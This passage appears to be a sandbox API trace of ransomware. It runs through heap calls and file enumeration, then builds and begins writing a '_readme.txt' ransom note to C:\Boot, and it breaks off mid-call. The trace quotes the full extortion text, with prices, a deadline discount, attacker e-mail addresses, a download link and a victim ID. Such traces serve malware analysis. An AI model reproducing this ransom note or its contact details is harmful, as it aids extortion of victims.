0x74c3240 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9750 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce99d0 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9a98 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3320 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3400 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9c28 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5808 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37b8 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce90e8 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5898 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce98e0 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3390 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8490 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f4b10 | out: hHeap=0x4970000) returned 1 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.791] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3631160, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3631160, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.792] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3631160, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3631160, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.792] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3390 [0127.792] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3390 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.794] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.795] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.795] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.796] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.796] PathFindFileNameW (pszPath="") returned="" [0127.796] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.796] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0127.796] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0127.796] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.796] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.796] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.796] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 